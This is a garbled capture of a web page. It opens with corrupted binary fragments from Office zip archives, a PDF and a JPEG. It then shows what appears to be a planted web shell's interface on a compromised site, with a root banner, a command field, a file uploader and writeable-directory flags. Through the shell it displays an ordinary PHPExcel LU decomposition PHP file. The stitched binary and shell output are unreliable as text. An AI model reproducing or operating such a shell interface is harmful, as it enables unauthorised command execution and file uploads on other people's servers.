œ_#ÁÕ§TE NAŒ“KeÉ:”(åŽÖJÞùY’‚ñùž7; «]Û ý`8g“¯B© jd ÖÖ¸ðzœ¸¦4Ç3Kó^(ÍÖ¼ Õ€pvìwšõB4d f$Èü^0˜…åÌC$#2FŽÑ§±¦ÛZ/÷š&m£ñzÒÖ ’.Î]!Î;ƒ(Õ–¢d/—#Kª+tZyuÏB>NÛÖ†(¸ŒSà'³„Y˜´-_•¦¼´˜OlNK§¶ÒàŠˆTHµƒeTPå·fïM’…þuÏÍüp6دªE£åü‡ZØ'CKF#â«;‹eyO Qp„†l"ö1èíÙP ÏŒúl! BÝ2ñª•_VÁÉ÷3eu`–F¸ìI--ö<¿žë¯4õ캿¢)34Å{wMÉ2ÆÖFŸ¥` e9Ú¶¸P‡.”FÔï rY ‚²ÈTB,{ÛœéJ}«àQ4¹0Rû4D‚B§S‘ dO•v¾„™Sן¯3FeŸ™«+ÓâwH dÕÛÌì·P4ë&¥#rÜÉ Ù¦ê†ý·xòqk¯2,¹§™E\­ék‚×SᔏںÙ⺷ö£6…à ʾ qSá³Å|;àû}4Ÿ($â¹VY~óÍ!èÜÒŒËX½Ù1j‚VíÍŸš³+œ]«½g{_{/vµ½\¢¶vÉWKÿ:ñám½ ¥ S²x‘t ŽšÝÙÿÀÇ^ný PK   IW™k‚½÷ á  _rels/.relsUT dìd dìd dìd­’ÏNÃ0 ‡ï{ŠÈ÷ÕÝ@¡¥» ¤Ý*`%îÑ&QâÁöö‚J£ì°cœŸ¿|¶²ÙÆA½rL½wVE Šñ¶w­†çúay * 9Kƒw¬áÈ ¶ÕbóÄIîI]’Ê—4t"á1™ŽGJ…ìòMããH’±Å@æ…ZÆuYÞ`üÍ€jÂT;«!îì T} |Û7MoøÞ›ýÈNN<|v–í2ÄÜ¥ÏèšbË¢Ázó˜Ë )„"£O­Ï7ú{ZYÈ’yÞç#1'tuÉM?6o>Z´_å9›ëKÚ˜}?þ³žÏÌ·N>fµx PK    IWª½e  ¢ U  € word/document.xmlUT dìdPK    IWþË3” z  €J¢ word/settings.xmlUT dìdPK    IWC‡{š' ƒ  €¤ docProps/custom.xmlUT dìdPK    IW츱=Œ   €‡¥ [Content_Types].xmlUT dìdPK    IWV%ë±"   €U§ docProps/app.xmlUT dìdPK    IW€RŒ 3  €¶¨ docProps/core.xmlUT dìdPK    IWkòDn ô  €ª word/_rels/document.xml.relsUT dìdPK    IW ;$î   €Î« word/fontTable.xmlUT dìdPK    IW+åäz] ÷.  €ý¬ word/numbering.xmlUT dìdPK    IW¤2×r- ¿  €›° word/styles.xmlUT dìdPK    IWMFÒ ø  €´ word/header1.xmlUT dìdPK    IWF— T e  €· word/media/image1.jpegUT dìdPK    IW!Yéáå   €°Ë word/media/image2.pngUT dìdPK    IW°Àºë ú  €ÙÌ word/media/image3.pngUT dìdPK    IW$“†ª L  €Î word/footer1.xmlUT dìdPK    IWzaGôM   €ñÑ word/footer2.xmlUT dìdPK    IW–µ­âº P  €}Õ word/theme/theme1.xmlUT dìdPK    IW™k‚½÷ á €{Û _rels/.relsUT PK   ! bîh^   [Content_Types].xml ¢(   ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f› ˜q·ÃR4DáAJ¬h>€ãÚÇV߯¹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØ Pk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦Ñ äEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þ ÿÿ PK   ! µU0#ô L _rels/.rels ¢(   ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu *&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›×–¦é ?ˆ9LìÒ™ÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðÉ‚‹¨Þ ÿÿ PK   ! Q48wÛ —  xl/workbook.xml¤UÙnâ0}iþ!cñ‡ *–¢AšVU×$dC¬&vÆv UÕŸë@XÊK§/¹p|Žï¹N÷b“¥Ö •Š ÞC¸î"‹òHÄŒ¯zèá~b·‘¥4á1I§=ôJºèÿüÑ] ù¼âÙ ®z(Ñ:GE ͈ª‹œrˆ,…̈†©\9*—”Ä*¡Tg©ã¹nàd„q´Eåg0ÄrÉ":Q‘Q®· ’¦D}•°\UhYô¸ŒÈç"·#‘å ±`)Ó¯%(²²(œ®¸d‘‚ì nZ w v¡ñª• t¶TÆ")”Xê:@;[Ògú±ë`|²›ó=ø’ïHúÂL÷¬dðEVÁ+8€a÷Ûh¬Uz%„Íû"ZsÏÍCýî’¥ôqk]‹äù5ÉL¦Rd¥Dé˘i÷P ¦bM/|dÉ",…¨çãFNoçiûéë>aêiçsó#ðÄ ÕTr¢éHp ÜIú®ÝJìQ"ÀÜÖ-ý[0I¡¦ÀZ Z…d¡nˆN¬B¦=4 g %PDF-1.4 %âãÏÓ 3 0 obj << /Linearized 1 /L 422775 ÿØÿà JFIF    ÿÛ C      ÿÛ C   ÿÀ  X" ÿÄ    ÿÄ H   !1A"Qaq2‘¡#±ÁBRÑ3Cbrá$S‚¢²ð4ñ%6DTc’ÂsÿÄ   ÿÄ =  !1AQ"aq‘Á2R¡±BÑð#3br’²4á$‚¢ÂñÿÚ   ? áHBßÝ`„! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! ! stream

___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :

ikan Uploader :
Directory :  /var/www/vhosts/omkar.com/httpdocs/application/libraries/PHPExcel/Shared/JAMA/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/vhosts/omkar.com/httpdocs/application/libraries/PHPExcel/Shared/JAMA/LUDecomposition.php
<?php
/**
 *    @package JAMA
 *
 *    For an m-by-n matrix A with m >= n, the LU decomposition is an m-by-n
 *    unit lower triangular matrix L, an n-by-n upper triangular matrix U,
 *    and a permutation vector piv of length m so that A(piv,:) = L*U.
 *    If m < n, then L is m-by-m and U is m-by-n.
 *
 *    The LU decompostion with pivoting always exists, even if the matrix is
 *    singular, so the constructor will never fail. The primary use of the
 *    LU decomposition is in the solution of square systems of simultaneous
 *    linear equations. This will fail if isNonsingular() returns false.
 *
 *    @author Paul Meagher
 *    @author Bartosz Matosiuk
 *    @author Michael Bommarito
 *    @version 1.1
 *    @license PHP v3.0
 */
class PHPExcel_Shared_JAMA_LUDecomposition
{
    const MATRIX_SINGULAR_EXCEPTION    = "Can only perform operation on singular matrix.";
    const MATRIX_SQUARE_EXCEPTION      = "Mismatched Row dimension";

    /**
     *    Decomposition storage
     *    @var array
     */
    private $LU = array();

    /**
     *    Row dimension.
     *    @var int
     */
    private $m;

    /**
     *    Column dimension.
     *    @var int
     */
    private $n;

    /**
     *    Pivot sign.
     *    @var int
     */
    private $pivsign;

    /**
     *    Internal storage of pivot vector.
     *    @var array
     */
    private $piv = array();

    /**
     *    LU Decomposition constructor.
     *
     *    @param $A Rectangular matrix
     *    @return Structure to access L, U and piv.
     */
    public function __construct($A)
    {
        if ($A instanceof PHPExcel_Shared_JAMA_Matrix) {
            // Use a "left-looking", dot-product, Crout/Doolittle algorithm.
            $this->LU = $A->getArray();
            $this->m  = $A->getRowDimension();
            $this->n  = $A->getColumnDimension();
            for ($i = 0; $i < $this->m; ++$i) {
                $this->piv[$i] = $i;
            }
            $this->pivsign = 1;
            $LUrowi = $LUcolj = array();

            // Outer loop.
            for ($j = 0; $j < $this->n; ++$j) {
                // Make a copy of the j-th column to localize references.
                for ($i = 0; $i < $this->m; ++$i) {
                    $LUcolj[$i] = &$this->LU[$i][$j];
                }
                // Apply previous transformations.
                for ($i = 0; $i < $this->m; ++$i) {
                    $LUrowi = $this->LU[$i];
                    // Most of the time is spent in the following dot product.
                    $kmax = min($i, $j);
                    $s = 0.0;
                    for ($k = 0; $k < $kmax; ++$k) {
                        $s += $LUrowi[$k] * $LUcolj[$k];
                    }
                    $LUrowi[$j] = $LUcolj[$i] -= $s;
                }
                // Find pivot and exchange if necessary.
                $p = $j;
                for ($i = $j+1; $i < $this->m; ++$i) {
                    if (abs($LUcolj[$i]) > abs($LUcolj[$p])) {
                        $p = $i;
                    }
                }
                if ($p != $j) {
                    for ($k = 0; $k < $this->n; ++$k) {
                        $t = $this->LU[$p][$k];
                        $this->LU[$p][$k] = $this->LU[$j][$k];
                        $this->LU[$j][$k] = $t;
                    }
                    $k = $this->piv[$p];
                    $this->piv[$p] = $this->piv[$j];
                    $this->piv[$j] = $k;
                    $this->pivsign = $this->pivsign * -1;
                }
                // Compute multipliers.
                if (($j < $this->m) && ($this->LU[$j][$j] != 0.0)) {
                    for ($i = $j+1; $i < $this->m; ++$i) {
                        $this->LU[$i][$j] /= $this->LU[$j][$j];
                    }
                }
            }
        } else {
            throw new PHPExcel_Calculation_Exception(PHPExcel_Shared_JAMA_Matrix::ARGUMENT_TYPE_EXCEPTION);
        }
    }    //    function __construct()

    /**
     *    Get lower triangular factor.
     *
     *    @return array Lower triangular factor
     */
    public function getL()
    {
        for ($i = 0; $i < $this->m; ++$i) {
            for ($j = 0; $j < $this->n; ++$j) {
                if ($i > $j) {
                    $L[$i][$j] = $this->LU[$i][$j];
                } elseif ($i == $j) {
                    $L[$i][$j] = 1.0;
                } else {
                    $L[$i][$j] = 0.0;
                }
            }
        }
        return new PHPExcel_Shared_JAMA_Matrix($L);
    }    //    function getL()

    /**
     *    Get upper triangular factor.
     *
     *    @return array Upper triangular factor
     */
    public function getU()
    {
        for ($i = 0; $i < $this->n; ++$i) {
            for ($j = 0; $j < $this->n; ++$j) {
                if ($i <= $j) {
                    $U[$i][$j] = $this->LU[$i][$j];
                } else {
                    $U[$i][$j] = 0.0;
                }
            }
        }
        return new PHPExcel_Shared_JAMA_Matrix($U);
    }    //    function getU()

    /**
     *    Return pivot permutation vector.
     *
     *    @return array Pivot vector
     */
    public function getPivot()
    {
        return $this->piv;
    }    //    function getPivot()

    /**
     *    Alias for getPivot
     *
     *    @see getPivot
     */
    public function getDoublePivot()
    {
        return $this->getPivot();
    }    //    function getDoublePivot()

    /**
     *    Is the matrix nonsingular?
     *
     *    @return true if U, and hence A, is nonsingular.
     */
    public function isNonsingular()
    {
        for ($j = 0; $j < $this->n; ++$j) {
            if ($this->LU[$j][$j] == 0) {
                return false;
            }
        }
        return true;
    }    //    function isNonsingular()

    /**
     *    Count determinants
     *
     *    @return array d matrix deterninat
     */
    public function det()
    {
        if ($this->m == $this->n) {
            $d = $this->pivsign;
            for ($j = 0; $j < $this->n; ++$j) {
                $d *= $this->LU[$j][$j];
            }
            return $d;
        } else {
            throw new PHPExcel_Calculation_Exception(PHPExcel_Shared_JAMA_Matrix::MATRIX_DIMENSION_EXCEPTION);
        }
    }    //    function det()

    /**
     *    Solve A*X = B
     *
     *    @param  $B  A Matrix with as many rows as A and any number of columns.
     *    @return  X so that L*U*X = B(piv,:)
     *    @PHPExcel_Calculation_Exception  IllegalArgumentException Matrix row dimensions must agree.
     *    @PHPExcel_Calculation_Exception  RuntimeException  Matrix is singular.
     */
    public function solve($B)
    {
        if ($B->getRowDimension() == $this->m) {
            if ($this->isNonsingular()) {
                // Copy right hand side with pivoting
                $nx = $B->getColumnDimension();
                $X  = $B->getMatrix($this->piv, 0, $nx-1);
                // Solve L*Y = B(piv,:)
                for ($k = 0; $k < $this->n; ++$k) {
                    for ($i = $k+1; $i < $this->n; ++$i) {
                        for ($j = 0; $j < $nx; ++$j) {
                            $X->A[$i][$j] -= $X->A[$k][$j] * $this->LU[$i][$k];
                        }
                    }
                }
                // Solve U*X = Y;
                for ($k = $this->n-1; $k >= 0; --$k) {
                    for ($j = 0; $j < $nx; ++$j) {
                        $X->A[$k][$j] /= $this->LU[$k][$k];
                    }
                    for ($i = 0; $i < $k; ++$i) {
                        for ($j = 0; $j < $nx; ++$j) {
                            $X->A[$i][$j] -= $X->A[$k][$j] * $this->LU[$i][$k];
                        }
                    }
                }
                return $X;
            } else {
                throw new PHPExcel_Calculation_Exception(self::MATRIX_SINGULAR_EXCEPTION);
            }
        } else {
            throw new PHPExcel_Calculation_Exception(self::MATRIX_SQUARE_EXCEPTION);
        }
    }
}

........